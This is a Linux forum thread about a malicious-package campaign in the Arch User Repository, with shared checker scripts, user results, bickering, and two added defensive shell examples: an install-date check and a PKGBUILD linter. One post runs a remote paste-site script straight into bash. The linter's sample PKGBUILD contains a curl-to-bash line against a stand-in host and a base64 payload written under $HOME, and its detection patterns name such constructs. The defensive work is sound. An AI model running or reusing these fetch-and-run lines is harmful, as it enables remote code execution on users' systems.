Malicious AUR packages

Nothing malicious found on my install.

I guess I won’t update AUR packages at all for a week or so, as it is still an ongoing event and it’s uncertain whether it is already over.

That GitHub repo not only contains a script to check whether you’ve got one of the malicious packages on your system, but also provides an overview of the situation and some recommendations on what to do if you’re affected.

Overall, as the attack vector included identity theft / impersonation of a legitimate KDE maintainer via git commit forgery, I’ll order a drink for that maintainer, symbolically. It is no joke when you’re in the middle of a supply-chain attack and your reputation is in limbo, more or less. But luckily the Arch team has clarified that suspicion: it was impersonation.

AUR is not for the faint of heart!

So, we got it. Please stop now, as it does not contribute anything meaningful anymore, thanks.

Don’t patronize me, alright! Move on and get on with your own life, Regular!
:roll_eyes:

To be honest, I agree with @milkytwix; you have been gloating about this quite enough.

What I said above goes for you too.

If you or anyone thinks I am breaking any rules of the forum, flag me!

But don’t you or anyone put yourselves in a position to patronize me. Get it?

If you don’t want to be patronized, why are you trying to patronize me, I wonder.

One of the members over at Garuda posted a script to check for infected packages…

[eosblu@machina Desktop]$ ./maltest.sh

Checking for infected AUR packages (494 total)...
Clean: None of the known infected packages were installed within 48 hours of the campaign.

Guys, don’t bury actual meaningful contributions and shared information about the actual situation with random noise. Be reasonable.

The link to the script to check for malicious packages in the AUR that I posted earlier originated from the Arch Linux Discord channel, in case you didn’t trust a private GitHub account that may seem arbitrary and not actually affiliated with the Arch dev team directly, which is actually a concern that might raise some eyebrows. I guess it will be updated in case there are new findings. At least the latest commit is only a few hours old.

Earlier today, a similar script originating from a moderator on Cachy’s forum:

If I understand correctly, it’s over 900 now
(New Wave of malicious packages?)

Edit: according to some other thing (some GitHub script) it seems to be 1577 as of right now

FYI: Arch User Repository hit by a large-scale malware campaign, with maintainers racing to roll back malicious commits and lock out bad actors.

If you’re an Arch Linux user, today would not be a good day to download and install packages from AUR.

Link from Garuda Forum member…

[eosblu@machina Desktop]$ bash ./maltest2.sh

Checking for infected AUR packages (1595 total)...
Clean: None of the known infected packages were installed within 2 days of the campaign.

this test came up NO INFECTION

Will try the Garuda one next.

I couldn’t find a link in that thread anywhere for this maltest.sh file. Will read the thread again.

This link is the one that is updating the list, I just renamed the script.

The number added as of now is 1,606.

thank you kindly

edit:

$ bash <(curl -s https://cscs.pastes.sh/raw/aurvulntest20260611.sh)

Checking for infected AUR packages (1595 total)...

Clean: None of the known infected packages were installed within 2 days of the campaign.

This one judged me clean in like 1/100th of a second; not a scan whatsoever, just a date check I guess.
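For anyone wondering what such a "date check" actually does, here is an added illustration, not the script linked in the thread and not any Arch or Garuda tooling. It reads pacman’s local database (one directory per installed package under /var/lib/pacman/local/<name>-<version>/, whose desc file carries %NAME%, %VERSION% and %INSTALLDATE% blocks) and reports packages that are both on a given list and recorded as installed inside a given time window. The package names, timestamps and list used below are constructed for the demo; a real run would point it at /var/lib/pacman/local and at the published list of affected packages.

```shell
# Added example (not the script linked in the thread, nor any Arch tooling):
# a minimal version of the same "date check". pacman keeps one directory per
# installed package under /var/lib/pacman/local/<name>-<version>/ whose 'desc'
# file holds %NAME%, %VERSION% and %INSTALLDATE% (a Unix timestamp) blocks.
# The package list and the campaign window used below are constructed for
# illustration; in practice the list must come from the published findings.

# Print the value following a %FIELD% header in a pacman desc file.
#   $1 = path to desc file, $2 = field name without the percent signs
desc_field() {
    awk -v f="%$2%" '$0 == f { getline; print; exit }' "$1"
}

# check_infected <local-db-dir> <list-file> <window-start> <window-end>
#   list-file: one package name per line; window: Unix timestamps.
# A package is reported only if it is on the list AND its recorded install
# date falls inside the window. Prints "name version installdate" per hit;
# exit status 0 = clean, 1 = at least one hit.
check_infected() {
    dbdir=$1; list=$2; start=$3; end=$4
    found=0
    for desc in "$dbdir"/*/desc; do
        [ -f "$desc" ] || continue
        name=$(desc_field "$desc" NAME)
        # Fixed-string, whole-line match so "foo" does not also match "foobar".
        grep -qxF -- "$name" "$list" || continue
        idate=$(desc_field "$desc" INSTALLDATE)
        [ -n "$idate" ] || continue
        if [ "$idate" -ge "$start" ] && [ "$idate" -le "$end" ]; then
            printf '%s %s %s\n' "$name" "$(desc_field "$desc" VERSION)" "$idate"
            found=$((found + 1))
        fi
    done
    [ "$found" -eq 0 ]
}

# --- constructed sample data: a fake local db in a temp dir -----------------
fake_pkg() {   # $1 = db dir, $2 = name, $3 = version, $4 = install timestamp
    mkdir -p "$1/$2-$3"
    printf '%%NAME%%\n%s\n\n%%VERSION%%\n%s\n\n%%INSTALLDATE%%\n%s\n\n' \
        "$2" "$3" "$4" > "$1/$2-$3/desc"
}

make_fake_db() {
    d=$(mktemp -d)
    fake_pkg "$d" example-bad-pkg 1.0-1 1749600000   # listed, installed in window
    fake_pkg "$d" example-old-pkg 2.3-1 1700000000   # listed, but installed long before
    fake_pkg "$d" firefox 120.0-1 1749650000         # in window, but not listed
    printf 'example-bad-pkg\nexample-old-pkg\n' > "$d/list.txt"   # hypothetical list
    echo "$d"
}

# Demo on the constructed data; prints "example-bad-pkg 1.0-1 1749600000".
demo_db=$(make_fake_db)
if check_infected "$demo_db" "$demo_db/list.txt" 1749500000 1749700000; then
    echo "Clean: none of the listed packages were installed inside the window."
else
    echo "SUSPECT: review the package(s) above."
fi
```

Two caveats the fast "clean" verdict hides: it only knows about packages that are on the list it was given, so it is only as current as that list, and it says nothing about a package that was installed earlier and later updated to a malicious revision unless the update re-stamped %INSTALLDATE% inside the window. It is a triage step, not a scan of what the build actually did.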

Better start counting the AUR packages that aren’t infected :see_no_evil_monkey:

This actually seems like a solid use case for AI. If human moderators can’t manually review every package build, an AI system could at least scan for suspicious patterns like unexpected sed, awk, or, in this case, npm usage and flag them for human approval. And with the recent DDoS issues, they might also want to consider a P2P approach.
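A much simpler version of that "flag it for a human" idea does not need AI at all: a grep-based heuristic pass over the PKGBUILD. The following is an added example, not code from this thread and not any Arch or AUR tooling. The pattern list is an illustrative assumption (remote script piped into a shell, base64 decoding, npm installs, eval, writes under $HOME or into systemd unit directories, in-place sed/awk edits, 'SKIP' checksums), and it deliberately produces false positives such as a legitimate sed -i in prepare(), because the point is to surface lines for review, not to decide. Both PKGBUILDs it scans are constructed for the demo.

```shell
# Added example, not from the thread or any Arch/AUR tooling: a crude
# heuristic linter in the spirit of the suggestion above. It greps a PKGBUILD
# for constructs a build script rarely needs and lists the hits for a human
# to review. The pattern set is an illustrative assumption, not a signature.

# pkgbuild_hits <PKGBUILD>: print "lineno:text" for each matching non-comment line.
pkgbuild_hits() {
    grep -nE \
        -e '(curl|wget)[^|]*\|[[:space:]]*(ba)?sh([[:space:]]|$)' \
        -e 'base64[[:space:]]+(-d|--decode)' \
        -e '(^|[[:space:];|&])npm[[:space:]]+(install|i|exec)([[:space:]]|$)' \
        -e '(^|[[:space:];|&])eval[[:space:]]' \
        -e '\$HOME|~/\.config|systemd/(user|system)' \
        -e '(^|[[:space:];|&])(sed|awk)[[:space:]]+-i' \
        -e "sums=\\(.*'SKIP'" \
        "$1" | grep -vE '^[0-9]+:[[:space:]]*#' || true
}

# pkgbuild_hit_count <PKGBUILD>: print the number of flagged lines.
pkgbuild_hit_count() {
    pkgbuild_hits "$1" | grep -c . || true
}

# --- constructed sample PKGBUILDs in a temp dir -----------------------------
write_sample_pkgbuilds() {
    d=$(mktemp -d)
    mkdir -p "$d/benign" "$d/suspicious"
    # Benign: one in-place sed in prepare(), a common legitimate pattern that
    # this heuristic still flags for review (expected: 1 hit).
    cat > "$d/benign/PKGBUILD" <<'EOF'
pkgname=example-benign
pkgver=2.3
pkgrel=1
arch=('x86_64')
source=("https://example.invalid/$pkgname-$pkgver.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000')

prepare() {
  cd "$srcdir/$pkgname-$pkgver"
  sed -i 's|/usr/local|/usr|' Makefile
}

build() {
  cd "$srcdir/$pkgname-$pkgver"
  make
}

package() {
  cd "$srcdir/$pkgname-$pkgver"
  make DESTDIR="$pkgdir" install
}
EOF
    # Suspicious: unverifiable checksum, remote script piped into bash, base64
    # blob written under $HOME, npm install (expected: 4 hits, comment ignored).
    cat > "$d/suspicious/PKGBUILD" <<'EOF'
pkgname=example-suspicious
pkgver=1.0
pkgrel=1
arch=('any')
source=("https://example.invalid/$pkgname-$pkgver.tar.gz")
sha256sums=('SKIP')

package() {
  cd "$srcdir/$pkgname-$pkgver"
  install -Dm755 bin/tool "$pkgdir/usr/bin/tool"
  # nothing to see here
  curl -s https://example.invalid/setup.sh | bash
  echo "ZWNobyBoaQ==" | base64 -d > "$HOME/.config/.helper"
  npm install -g some-package
}
EOF
    echo "$d"
}

# Demo on the constructed files: 4 hits for the suspicious one, 1 for the benign one.
demo=$(write_sample_pkgbuilds)
for f in "$demo/suspicious/PKGBUILD" "$demo/benign/PKGBUILD"; do
    echo "== $f: $(pkgbuild_hit_count "$f") hit(s) =="
    pkgbuild_hits "$f"
done
```

Run it against a real PKGBUILD before building with `pkgbuild_hits ./PKGBUILD` and read every hit yourself; a clean result only means none of these particular strings appeared, which is exactly the limitation a static pattern list has against an attacker who knows the list.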